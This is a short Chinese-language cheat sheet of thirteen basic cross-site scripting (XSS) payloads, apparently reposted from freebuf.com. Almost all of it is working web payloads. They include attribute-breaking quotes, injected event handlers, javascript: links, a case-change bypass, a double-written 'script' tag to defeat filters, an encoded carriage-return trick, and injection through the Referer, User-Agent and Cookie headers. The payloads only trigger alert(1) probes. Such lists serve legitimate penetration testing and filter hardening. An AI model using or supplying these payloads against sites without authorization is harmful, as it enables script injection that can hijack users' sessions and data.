XSS的基本语句 – 作者:ailfr自闭

万能的检查语句：<SCRscriptIPT>’”()Oonnjavascript

1、<script>alert(1)</script>

2、”><script>alert(1)</script>

3、’ onchange=’alert(1)’ //                                          html 事件 onchange-当元素改变时运行脚本

4、“ onchange=’alert(1)’ //                                          html 事件

5、“><a href=” javascript:alert(1)”                               html  a标签

6、“><a HREF=”javascript:alert(1)”                              html a标签的大小写转换

7、“><scrscriptipt>alert(1)</scrscriptipt>                   双写绕过

8、Javascr&#13ipt:alert(1)                                             &#13  13是回车

9、Javascr&#13ipt:alert(‘http://’)

10、t_sort=”type=”button” onfocus=”alert(1)               onfocus-当窗口获得焦点时运行脚本

11、Referer传“ type=”button” onclick=”alert(1)

12、User agent传 “ type=”button” onclick=”alert(1)

13、Cookies传 user=” onclick=”alert(1)” type=”text”

来源：freebuf.com 2021-06-14 12:07:01 by: ailfr自闭